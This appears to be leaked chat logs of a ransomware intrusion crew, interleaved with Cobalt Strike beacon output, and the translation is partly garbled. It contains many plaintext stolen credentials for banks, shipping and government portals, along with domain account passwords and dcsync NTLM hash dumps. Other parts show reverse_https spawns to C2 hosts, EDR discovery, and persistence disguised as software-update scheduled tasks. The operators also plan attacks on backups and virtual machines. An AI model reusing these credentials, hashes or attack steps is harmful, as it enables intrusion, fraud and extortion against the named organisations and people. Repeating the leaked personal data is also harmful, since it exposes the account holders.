                       79DAC70F2FF8D83CD3C329E33AFAC731DD9224BC553430850CB37FD8DD950AA04080BE6AA165
                       51DB03D1B165C5EDBC853ECFAF1FF28A98F766F601BC964ED64560952CE86767A7104A15122A
                       90307347778F1F177C1C50E814D80DFED26A60DA4998D024CEAA298234E63B7CD35F2F9621C6
                       46F61E1B628F7278FFE78F3044D0D03B4EA1409157C6D75C12DCBA8B029950EF2539361DA38C
                       782B0720EF483A314B085CA5F6309C37F549CB24B80466B842B5B784ED014902A86BFEA6D56B
                       1782FAB1C5611E2BBF96ACF2799E6DF9C45DF66C2CB96154F8415505920EAB91909364BBB0A8
                       FFA501E2C6EB7F546D4F65C1159EA747BD94B79A3E9C3BE4E899AB5058FBA0EFE6EBFF703C95
                       7F506BF977E8F798B07BAD10D4BDE26E792660B6873599D2F0C6F33020E2A6C7EAFE5369D982
                       3A842E2B941C92EBC8996E5D9D136C334F004F0A58BBEBC3916F992C6553690F79B77ED71121
                       49EAB80EBE9CFBC20AD4CC7E2C4B3126C51F9D6CAA09FA61F567A9CC70B97FB49DC96B4DA7E2
                       F8AD8EB0E0B35EFD6CFE4F9FEF796AE3A588DBD5757FA7794A5FD7A1F67BD0D1D24BE5D6E9FE
                       718761A919C61BD8171E37509878599A3BF73A38A538C074396A5815346AA591D61014F0E1FE
                       175731E561942B5B7665BB9545DA74B6998B6B3D335FBDC8B1BA3E13168F3D95324BF8AB5B00
                       A1EC7CE50289766C14894416EA3812E6359CF70C6F474C67D360F75B68A4630DAA0433F11D76
                       69020B7D2C87FC6FDF591CC3679478B6AF15BD58415271EA71071DFE9953AD6586C7BABAB3A9
                       467C5D0181CC953ECB572474B637C7CAFC0FBE2B7FF4AA65678E36663D3302C59486364F2611
                       12E90E021CEF7210B53FD516A59BE52BEBB9563822E629C00829439E08CF6DEB5FB590796892
                       250DA5919BED1A478E00D3901FA317A5B33DB1EDA40628C32013FAD83B9A9114380D837082E2
                       DDF60F2592B6CB7BA7D5E5CA0FFA5510DB7198F1361D72670F0DCA6338B17AB3CB1F354634D8
                       00079CFA520F87DA0E712BF8F7F0885583224148B08F99EFE55A43FB438E1FB5123F5AD6AE39
                       647D31DBBE82D73281790B964459FCDC5E59DC896DFC84F9B4364164291E197324721CCD4700
                       437E8A92D28E6501BDD0C85A555C5A872818B7BDB3F0F472112F9F8CD8C3BDE634256
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=activedirectory,DC=fishusa,DC=com
ServicePrincipalName : MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com:55423
``Lolospodayi ok)))) I just renamed hook.jar to Hook.jar tomorrow)``I'm going to sleep in general
no strength means you'll have to
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:Hook.jar -jar cobaltstrike.jar $*
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
``duplicate it...?''??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????but we caught depa (and the detector is less even though it was active but his old stub was not caught and how did depa appear again? without internet://dyncheck.com/scan/id/535edae924db877964d784a8713f84fc stub depa) and then scatter to all the workstations
start with servakovey and genereyte only in kobeshelkod bilder is fresh? and bluntly fuck some "on duty" will notice the anomaly on pk if they all rise from sleep, then the lock itself will take a decent amount of time there are some methods to work on speed? listenhttp://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/ since I was allowed into the garden - I commented on some topics, I propose that my humble remarks right in the first post so you do not have to read the whole thread can we at least chat?the task for both teamstoday until 21:00, if you do gpj you can go earlieryou will now be active practice is just with the aim of increasing rights, there will be cases where you will need to learn new things, where the standard methods will not work, and they just should be systematically addeda tangle I think no problem, this is still a relative such "order" of action, the question shortcut'a here
that is, the allocation of priority vectors and then secondary and tertiary - that is more difficult to exploit and less common in any case looks confusing because, for example, the previous version of the diagram was difficult to bring to a sensible form For infinite most likely you will have to move to another platform or present it in a different wayThe given meinmap is essentially the basis of the whole cycle of actions possible, that is, you can extend almost to infinity)then just vectorly develop with indication of used vulnerabilities (both LPE and network ones)
the MsSql vector as a whole what to add I understand you already "see"? but the beginning is correct, yes)) but promises without naughty) i can give you my account (please send login in PM under which i can read) mind-map remaster
http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/актуалочкаһттрѕ://www.xmind.net/download/До lunch continue yesterday's task on Mindmap and organize instructions:space_invader:hiiGood morningGood morningGood morningGood morning itgde @user3 ?pcsb.org say can I in this what's it `pinellas.local` and me?[ ](https://mediaeveryone.com/channel/general?msg=AwPNpZh9xSPnH2kZE) yes, in lss thanksGood morning can the new kobe
Mine got busted.
there were two nets closed:space_invader:hiv turned on)didaHellouser8 should be turned on, it's backhhiHi, where is everybody? goodnight tomorrow by 5but also nowhere to go, are there citrix adminspolzak groups - yuzak?
or servers? any other groups? in #corp-televisa-com-mx moved from the entry point
So far yes no, checked all the servers and cars where there is access, from the user segment of the servers have not yet been able to get out what have you done today?with this user can only be authorized on the virtual labs (on other machines could not authorize) checked all the browsers - clean, passwords from gppp did not match any of the domain users, kerbs removed and sent to brute force, siltbelt did not find anything (files and browser history), on all machines tried all eleveits that I have (literally all, even bypassing waka) sharfinder not rolled anywhere also clean now perechekaya on this machine (the past 2, all clear) browsers?no system rights?i wonder what else can i try? is there no other options? is it just a matter of waiting for the hash to unload the adfssvcadmin? yes, and your current domain username? when you check, please write to feedback if it does not work hashfinder removed? on other machines can not get up, eleveit kit does not work, what can i try? passwords (4 if you count the pass to the current user) that is not suitable to any acu all passed to the brute force already, both fikkerbya you gave hashes @tl2? LA passwords do not fit, eleveite did not help, I think to jump to another car and there try to climbbuyuyu password to the local admin ?
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 HSU-ADDC01 137.150.144.180
 HSU-ADDC07 137.150.146.61
 HSU-ADDC03-AZ 10.52.0.196

``Now that's the way the chein shoots no ad_trustc ls @tl2@tl1 @tl2 can hash on the brute force``.
[*] Tasked beacon to run .NET program: SharpChromium.exe logins
[+] host called home, sent: 690231 bytes
[+] received output:
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: MichaelLee) ---
URL : https://registration.tco.census.gov/myreg/change-password.jsf
Username : michaellee@missme.com
Password : MissRock90058%

--- Chromium Credential (User: MichaelLee) ---
URL : https://id-provider.tco.census.gov/nidp/saml2/sso
Username : michaellee@missme.com
Password : MissRock90058%

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1002
Password : KPN@12th

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1001
Password : KPN@12th

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : deodarmichael1
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://web17.secureinternetbank.com/EBC_EBC1961/EBC1961.ashx
Username :
Password : 152994828040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.fedex.com/en-us/home.html
Username : MissMe
Password : Sweet90058!

--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/static/private-portal-ui/
Username : Mi
Password : seoul

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : MISSMEMICHAEL
Password : !Alameda4715

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willing1
Password : 0058sweet

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://sellercentral.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme

--- Chromium Credential (User: MichaelLee) ---
URL : https://danceandmarvel.com/index.php/oitmain
Username : michael
Password : michael1234

--- Chromium Credential (User: MichaelLee) ---
URL : https://identity.avalara.com/account/login
Username : michaellee@missme.com
Password : Miss8040*

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.onlinelabels.com/SignIn.aspx
Username : michaellee@missme.com
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/pkmslogin.form
Username : Michael_Lee
Password : ^RcRvMiSs90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : patriciachoi@missme.com
Password : graceful0619

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.costcobusinessdelivery.com/Logon
Username : soohkim@missme.com
Password : sweet7706

--- Chromium Credential (User: MichaelLee) ---
URL : https://login.bigcommerce.com/login
Username : lisakim@missme.com
Password : RRvdrr $4715

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.certify.com/Login.aspx
Username : michaellee@missme.com
Password : $MissRock

--- Chromium Credential (User: MichaelLee) ---
URL : https://login.yahoo.com/account/challenge/password
Username : jclmichaellee
Password : $Holy0731

--- Chromium Credential (User: MichaelLee) ---
URL : https://accounts.shopify.com/login
Username : michaellee@missme.com
Password : MissMe8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://delsolpm.appfolio.com/connect/users/sign_in
Username : michaellee@missme.com
Password : young90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://www.efax.com/myaccount/login
Username : 2132323675
Password : 1260

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL :
Username : michaellee@missme.com
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://securedmail.bankofhope.com/securereader/login.jsf
Username : michaellee@missme.com
Password : spa0804?

--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : Michael Lee
Password : kingsley355

--- Chromium Credential (User: MichaelLee) ---
URL : https://engpermits.lacity.org/public/control.cfm
Username : michaellee@missme.com
Password : kingsley355

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : rcrvmichael1
Password : Rcrv8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 29873180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcfin.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : michaelmaison
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : missmemichael1
Password : spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : heprmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : pcho94
Password : whos90058

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : willinglee
Password : sweet8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : 3019westmichael
Password : Spai8040

--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.hanmi.com/hanmibankonline/uux.aspx
Username : d&mmichael1
Password : Spai8040

[*] Finished Google Chrome extraction.
``````
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 MM-DC1 192.168.1.2
 MM-DC2 192.168.1.111
 MM-DC3 192.168.1.214
``````
Teemo[HQ217]MichaelLee */13384|2020Dec22 01:33:58> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator JasonTak MEGACOM
ThomasChang
The command completed successfully.


Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:24> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain MissMe.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ServerAdmin$ ServerAdmin1$
ServerAdmin2$
The command completed successfully.


Teemo[HQ217]MichaelLee */13384|2020Dec22 01:34:51> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
megacom
megacom1
MISSME\brandonsantana
MISSME\Domain Admins
MISSME\IT_Admins
MISSME\MichaelLee
thomas
The command completed successfully.

``If we're done with the fixes, then let's move on to the parsing.
AnyDesk autoupdate#39932 20/01/2021 05:31:07 p. Listo
pjfrancocru sfe16537 corp.televisa.com
the context of the usual unconcerned username.
aha, delete deleted, left? i just do the build and delete after downloading i will say for sure delete their last deleted log saves? ahyhaxmasaka but i see in the logs only 2 builds have fixed 3 pieces again the same does not understand to have to get out on another car to fix that logical first work out those with - myself will fix me okponjalta the same crap[ ](https://mediaeveryone.com/channel/general?msg=b7uTJGwpAAPqPF7uW) and I only interacted[ ](https://mediaeveryone.com/channel/general?msg=KNnZDaj5uGyeJmFNs) through injecting into the neighboring process from the process only in another session with the car was possible to work I have such crashes only spawn and curedcobalt crashesinteract how? you write spawnfinancial.localbenihana.com not attached
247InTouchPCl.local is minus, you've been messing with it, nobody touched it anymore
cedarfinancial.local crashes kobutut we work the rest of them in netsnu where 2 other people work? if the old one was removed - ok I told @user8 the old one extinguished sccy-lt04 sccy.com you put 2 builds here?[ ](https://mediaeveryone.com/channel/general?msg=KTsDPaLzaBZtfH7EX) is[ ](https://mediaeveryone.com/channel/general?msg=xbWP52aMQTtnX34cp) how to restart?
usac context
dough sccy-lt04 sccy.com
Microsoft Teams autoupdate#81727 1/20/2021 6:15:52 PM Ready
``[ ](https://mediaeveryone.com/channel/general?msg=Euqwmkbt9wtAhdJid) this netsch I restart in sccy.commoya? 3 pieces and 1 did not arrive? everything? agadall in place? yeslf old deleted? rebuild done?)[ ](https://mediaeveryone.com/channel/general?msg=k5rvLkBNzcF4RimTH) Microsoft Teams autoupdate#15903 20/01/2021 05:06:56 PM Listo[ ](https://mediaeveryone.com/channel/general?msg=iqCETTGajeCX9rTuM) netusogr.televisia.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=qo75xSCiBZEqdcN35) is
user context
occdr occremote191 nk.spirit.com
Skype maintenance task#13547 1/20/2021 6:07:49 PM Ready
``Thank you, there's another thing``midwestsign.com 192.168.11.166 jkielsa CTXA715-04[ ](https://mediaeveryone.com/channel/general?msg=LmhG5G4tPR6HmBu8L) there is such a `CTXA715-04` I need external domain + rights type (system, user), hostname `Mitel autoupdate#82604 ` fix it isnu bluntly of course, I gave you several builds and the rule was not canceled + you gave access to do them Н number you and gave several builds, just did not compare + hurry up as many times I told: 1 build 1 run anyway redo faster technical details why? you were told to do so, you should have asked right away...if id then it is understandable.... i don't know if you could just give out 1 dll for all domains and not bother with the toolpanelthat's the point of generationeach build is unique and it has its own id. why? they still knock on the same domain? i also asked if you remember how to do it in ahuedll and shtasku and delete all the old ones need at least 4 builds now a new build and fix[ ](https://mediaeveryone.com/channel/general?msg=rxocXEpBqPrxag3c2) i'm still waiting for an answer i see in the toolbar that the last build built 1.5 hours ago have you forgotten that 1 fix 1 build? i will ask a very simple question + mount the same build ...?tell me how long have you been bindinfinancial.local1 = Skype autoupdate#35434 1/20/2021 5:38:26 PM Ready``?
192,168,0,2 Hgutierreze SFE18491 CORP.TELEVISA.COM.MX
McAfee autoupdate#45234 20/01/2021 04:34:49 PM. En ejecución
``+ are you building on both domains yes? corp.televisa.com.mx 10.170.4.168 pjfrancocru SFE16537[ ](https://mediaeveryone.com/channel/general?msg=YjxfWdJLDuKfhcQEJ) 2[ ](https://mediaeveryone.com/channel/general?msg=nJ8rdQuMvHZMhNpY6) 1 so far yes. about by which are they?[ ](https://mediaeveryone.com/channel/general?msg=TfnbXH6dmoi4kytp6) ?`sCTXA715-04` never arrived ?all dll are there and staska too?so far, both passed `midwestsign.com 192.168.11.166 jkielsa CTXA715-04` as @user7koba hung with this session u9 in solo mount? nk.spirit.com 10.0.0.20 occdr occremote191 any more mounts? which were previously mounted also mark the process, there was a little snack something mounted?so where there is no anchor-where anchored write + the very first characters in the Note the main anchor can be in which coba is the difference? in the input can? but you have access to the builder before i did) clearly, just did not do so before you are not going to work only with 4 nets?there's not 1 to 1 if all i did not understand, we need to fix all nets or only their own? only 2 nets what else is fixed? add comments in the input coba corrected above message in the general coba do mark what is fixed there, i shoot hell you do spawn@user8 look activity session you need as many networks to fix either further or do not do the rights?
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] tmevtmgr.sys Found
[+] TMUMH.sys Found
[+] 2 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Trend Micro Inc Found!
``````
====== AntiVirus ======

  Engine : Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\NTRmv.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Trend Micro Apex One Antivirus
  ProductEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\OfficeScan Client\TmListen.exe
``what's up with the av? no deletion of the deletion to fix and it's not flying to my coba what domain? long but it's not flying yet what? ``Adobe SvcRestartTask#20900 1/20/2021 4:10:24 PM Ready ``what's the name of the task?stask? dudl in place? yes, I made a new one and fixed it with the same build?[ ](https://mediaeveryone.com/channel/general?msg=kMNDp3SkYZuKMzv6f) I don't see10.0.0.59 system* sccy-05[ ](https://mediaeveryone.com/channel/general?msg=GeQz5F9CRCzqu5fkx) I have this domain, marked another session is taken and not signed ``
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
``We're losing our job, we don't know it in the shower, but it's empty``.
Teemo beacon> spawn u7
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (rawint.com:443)
[+] host called home, sent: 840 bytes
Teemo beacon> spawn https
[*] Tasked beacon to spawn (x64) windows/beacon_https/reverse_https (ownjar.com:443)
[+] host called home, sent: 261643 bytes
``guys I'm really asking you to mark the taken sessions work and is fixed? main.crispregional.org I opened the conf, no conf) if there is a conf, can you add the fix okkonf? fix is okkonf, ie, it was not marked I took it, and so is it ``
192.168.0.2 SYSTEM* SFE18491
CORP.TELEVISA.COM.MX
```
``CORP.TELEVISA.COM.MX\Hgutierreze R8WTksIOle1rP8)P and you can create a group with this domain ``
10.1.111.100 jgemperline BEN1064-MGR-10
benihana.com
and more external domains please write[ ](https://mediaeveryone.com/channel/general?msg=Ct9XShzSPimmfyrK5) +a, everything. see the file and stack173.234.155.15 192.168.75.175 https SYSTEM * CRRHORC19 no such thing... SYSTEM * CRRHORC19... system and company name or domainname... I need hostname?
SYSTEM * CRRHORC19okay. then you do not bother[ ](https://mediaeveryone.com/channel/general?msg=3BXgDHmQC8hAECd5s) For now, yes, I need to prepare labo for tomorrow, but I'm around) everyone okay with the builds? if there is a domain at once adminoperatively collect hashes to brut for @tl2 and do as @user9shall switch module[ ](https://mediaeveryone.com/channel/general?msg=fypApjmJxLdv9EZf6) yes, it worked@user3 you're not with us yet, right?
{
    { "domains": [
        "kalarada.com",
        "tuxomibo.com"
    ],
    { "bit": "x64",
    }, "period": "15",
    { "lasthope": 65
}
``didn't helprelogin tried? give parameters from show? the same crap no download not a single marked sessionwhere @user3 @user7 ?fix promptly or you stupidly have nothing to work with and domainsvtoolpanel updated bildraskid now fixes to entry pointsnot marked, in the entry coba alive not marked any sessions in the input? 2 people and one has a dead sessionyou have windows, all do not bind me?
```
 4836 924 naPrdMgr.exe
``Then what av? elfkbkfcmdaa should be in the folder after startup? I don't see2 min2 vby amongst the tocscscs ``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 1/21/2021 1:00:00 PM Ready
AdobeGCInvoker-1.0 1/21/2021 8:06:00 AM Ready
G2MUpdateTask-S-1-5-21-1989139100-303601 1/20/2021 2:38:00 PM Ready
G2MUploadTask-S-1-5-21-1989139139100-303601 1/20/20/2021 3:47:00 PM Ready
OneDrive Standalone Update Task-S-1-5-21 1/21/2021 11:04:46 PM Ready
is ``[ ](https://mediaeveryone.com/channel/general?msg=MnXjJmjcc5SNGbCHi) is there? already read above)) without YES[ ](https://mediaeveryone.com/channel/general?msg=g6oErPtYMLQZGn8bp) still yes no session 173.234.155.15 192.168.37.115 https amypriest CRRHHHCC4did you spell it?[ ](https://mediaeveryone.com/channel/general?msg=wPganWRj5HC2WAB5q) where is it? then the session fell offcrackDa@all anyone here?which are already there are 2 domains can be so that several sessions from one network always check the domain now mbe domains will change do not run) before starting tell where you start so by the classic anchor entry points know how to start do you know how to do the last just 65interval from 15 to 20 just check both domains questions how to use any?+ see the new toolkit? made you a new section in the toolkit would be very good at once up to YES and fix it) dismantle? one is) empty...entry coba``
192.169.6.82
https://ownjar.com
----------------------------------------------------------------------------------------
185.150.190.153:49698
9AR3B4a2bORZSN28ST8wLqbH0F0Wvo5buE2
``Be distracted for now, coordinate with each other and to the confabulary clarifying questions and logs on the work to try to close today let's all work on balimore fivea where @user9 ?@user3 off waspoca 4 how many of you? will balimore will spin, search nasa backups and stuff like that?) hello everyone have tasks?
URL : https://id.sophos.com/
Username : ithelp@teng.com
Password : expFedAdm1n$

``[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) another storage, same credits
```
https://10.20.4.52/ui/#/host/storage/datastores
``[ ](https://mediaeveryone.com/group/expfederal-com?msg=xuQ42XB7ok3LqQZp6)`` portscan 10.20.4.56 ``HOBBES\SAVDBAdm exp.FederalSAV`` to see what's on the server - root that is, won't remove the snapshots but lock the virtuals themselves inside that ``what to do?@tl2 what to do? and it's not like it's a nix server there 43 tb I see floppy disks and stuff check the snapshots of the virtuals I found this `beremote.exe` Symantec backup this thing is not in the ad comp
```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-vhp001.hobbes.loc/ui/
Username : root
Password : VXRail-2018

``This one's not available? 5480[ ](https://mediaeveryone.com/group/expfederal-com?msg=2XfcWXmLos5yfgNqm) What pool did you scan? ``It's not available[ ](https://mediaeveryone.com/group/expfederal-com?msg=vBgkQCXAf4mHaxmb7) Go through the ip on the full urlaga available``
10.20.4.56:636
10.20.4.56:514
10.20.4.56:443
10.20.4.56:389
10.20.4.56:88
10.20.4.56:80
10.20.4.56:22 (SSH-2.0-OpenSSH_7.4)
``I'll try the ip443 is open? yes it resonates at all? from the car threw it go to the ip from his car then)) and you threw sox...?[ ](https://mediaeveryone.com/group/expfederal-com?msg=N4pwzS2x547npWLnj) not more precisely the creeds, and generally does not go to the link more access no more?
>operatingSystemServicePack: Likewise Open unknown.unknown.unknown

``[ ](https://mediaeveryone.com/group/expfederal-com?msg=yvriitbtxRt3kXxTo) nix, creeds don't fitNo, everything must be fine everywhere
otherwise how would we work = )almost all and all machines with the same la ;it's nice to see for once properly configured service aces
HOBBES\SVC-SpPCHIDBG001 D66pHukJG5W7RwZD8PXi
HOBBES\SpSpvcApps_pchiwsg001 QGVS3bbeW03Rp7UUYIoD
```
what interesting creeds they have) ```
--- Chromium Credential (User: RamirezJ) ---
URL : https://uschi-psc001.hobbes.loc/websso/SAML2/SSO/vsphere.local
Username : Hobbes\RamirezJ
Password : Reva:thedog2017

``It worked, thank you.
URL : https://login.veeam.com/
Username : javier.ramirez@expFederal.com
Password : VM4l4d33n0r4l4d33n

``Bind PIP try ``USCHI-BKP110`` looks like veam
>description: Hyper-V server
USCHI-VHH010.Hobbes.loc
``````
HOBBES\RAMIREZJ Reva:thedog2017
HOBBES\SLADMIN SLTadmin2003
HOBBES\SLUSER SLTadmin2003
``57/146 alive``hobbes\svc-nwa001 KeysOfTheKingdom!``10.20.32.20vCenter 5.1 Server 2013 - PCHIAPG008.Hobbes.loc
vCenter 6.x -USCHI-VCH001.Hobbes.loc can also let into the admin in the center quite under the domaincredits DA of somecv-check fs and disks?
vcenter seems to be on wind
```
make sure the snapshots are also stored there on the server pinging, sorting and so on and look at the OS backup server also marked in the adcom, it's also Windows)
```
>description: vCenter 5.1 Server 2013
>description: vCenter 6.x
>description: vCenter 5.1 Server 2013 vCenter 6.x
>operatingSystem: Windows Server 2008 R2 Standard
``+++++ everything here? user9user4 go to tech
look up backup information
make sure you have access to the center (or that it is on the wind and will fit)
see where the vias is backing up
and you can nabiOknah it need to passthrough backdoors there? then do not mount if today shutdowns shutdowns today? dll give you the server and so on can prepare it for shutdowns at once avvs took two servokanals?
Teemo[PCHIDCG003]SYSTEM */4764|2020Dec11 00:33:52> dcsync Hobbes.loc
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:Hobbes.loc /all /csv command
[+] host called home, sent: 438858 bytes
[+] received output:
[DC] 'Hobbes.loc' will be the domain
[DC] 'PCHIDCG003.Hobbes.loc' will be the DC server
[DC] Exporting domain 'Hobbes.loc'
7351 TENG-ACCT$ 6d3a02a1dbfcc07957d1df41d5444768 2080
3781 SQLAgentCmdExec b3a7b463713310b41625147177fa0d3 66048
15301 SP_SSRS 076408f8e718dad08ad94a5e5019f762 66048
13103 SP_SRV 68a80609b1306f1e3add3f5b0c9ff181 66048
15642 SQLTESTDBUSER 2226330629e28473c4d290b17dcab0d0 524802
19340 SVC-Openfire-Admin a3f0910d49ba088a45d243438bcc48a2 66048
